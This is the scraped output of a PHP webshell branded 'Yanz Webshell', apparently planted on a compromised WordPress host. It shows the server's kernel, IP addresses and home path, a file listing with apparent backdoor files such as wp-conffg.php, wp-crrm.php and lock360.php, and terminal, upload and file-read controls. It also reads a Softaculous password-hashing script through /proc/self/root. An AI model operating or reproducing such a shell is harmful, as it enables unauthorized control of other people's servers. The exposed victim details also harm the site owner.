Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
8.3.30 Safe mode: OFF Datetime: 2026-05-05 18:33:56
3907.15 GB Free: 1081.24 GB (27%)
/home/repauqkb/public_html/ drwxr-x--- [ root ] [ home ] Text

Server IP:
198.54.116.179
Client IP:
216.73.216.147
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2026-05-05 09:27:21drwxr-x---Rename Touch
[ .. ]dir2025-04-18 09:10:57drwx--x--xRename Touch
[ wp-admin ]dir2026-05-05 01:36:32drwxr-xr-xRename Touch
[ wp-content ]dir2026-05-05 01:36:33drwxr-x---Rename Touch
[ wp-includes ]dir2026-05-05 01:36:38drwxr-xr-xRename Touch
.hcflag31 B2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
.htaccess626 B2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
.htaccess.bk243 B2026-04-28 01:30:21-rw-r--r--Rename Touch Edit Download
.litespeed_flag297 B2026-05-05 01:36:06-rw-r--r--Rename Touch Edit Download
error_log16.18 MB2026-05-05 18:33:56-rw-r--r--Rename Touch Edit Download
goods.php173.77 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
index.php16.36 KB2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
lock360.php1.40 KB2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
options-privacy-more.php768 B2025-06-24 17:01:07-rw-r--r--Rename Touch Edit Download
qinfofuns.php12.90 KB2026-04-23 18:25:11-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-activate.php7.18 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-blog-header.php351 B2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-conffg.php122.70 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-config.php3.55 KB2026-03-27 14:45:59-rw-r--r--Rename Touch Edit Download
wp-cron.php5.49 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-crrm.php77.12 KB2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.43 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-login.php50.23 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-settings.php30.33 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-trackback.php5.09 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wper.php16.31 KB2026-01-27 01:19:39-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
yeni.php27.21 KB2026-04-23 17:49:33-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

HEX
HEX
Server: LiteSpeed
System: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: repauqkb (12019)
PHP: 8.3.30
Disabled: NONE
$ pwd: /proc/self/root/var/softaculous/stripe/
Upload Files
File: //proc/self/root/var/softaculous/stripe/update_pass.php
<?php

$salt = __salt('[[admin_pass]]');
$methodAndSalt = '$2y$' . $salt;
	
$resp = crypt('[[admin_pass]]', $methodAndSalt);
echo '<update_pass>'.$resp.'</update_pass>';
echo '<update_salt>'.$salt.'</update_salt>';
@unlink('update_pass.php');



// Create the Salt
function __salt($password, $member = null) {
	$generator = new __RandomGenerator();
	return sprintf('%02d', 10) . '$' . substr($generator->generateHash('sha1'), 0, 22);
}

// Class to create the salt
class __RandomGenerator {

	/**
	 * Note: Returned values are not guaranteed to be crypto-safe,
	 * depending on the used retrieval method.
	 * 
	 * @return string Returns a random series of bytes
	 */
	function generateEntropy() {
		$isWin = preg_match('/WIN/', PHP_OS);
		
		// TODO Fails with "Could not gather sufficient random data" on IIS, temporarily disabled on windows
		if(!$isWin) {
			if(function_exists('mcrypt_create_iv')) {
				$e = mcrypt_create_iv(64, MCRYPT_DEV_URANDOM);
				if($e !== false) return $e;
			}
		}

		// Fall back to SSL methods - may slow down execution by a few ms
		if (function_exists('openssl_random_pseudo_bytes')) {
			$e = openssl_random_pseudo_bytes(64, $strong);
			// Only return if strong algorithm was used
			if($strong) return $e;
		}

		// Read from the unix random number generator
		if(!$isWin && !ini_get('open_basedir') && is_readable('/dev/urandom') && ($h = fopen('/dev/urandom', 'rb'))) {
			$e = fread($h, 64);
			fclose($h);
			return $e;
		}

		// Warning: Both methods below are considered weak

		// try to read from the windows RNG
		if($isWin && class_exists('COM')) {
			try {
				$comObj = new COM('CAPICOM.Utilities.1');
				$e = base64_decode($comObj->GetRandom(64, 0));
				return $e;
			} catch (Exception $ex) {
			}
		}

		// Fallback to good old mt_rand()
		return uniqid(mt_rand(), true);
	}
	
	/**
	 * Generates a hash suitable for manual session identifiers, CSRF tokens, etc.
	 * 
	 * @param String $algorithm Any identifier listed in hash_algos() (Default: whirlpool)
	 *  If possible, choose a slow algorithm which complicates brute force attacks.
	 * @return String Returned length will depend on the used $algorithm
	 */
	function generateHash($algorithm = 'whirlpool') {
		return hash($algorithm, $this->generateEntropy());
	}
	
}
?>
@ Telegram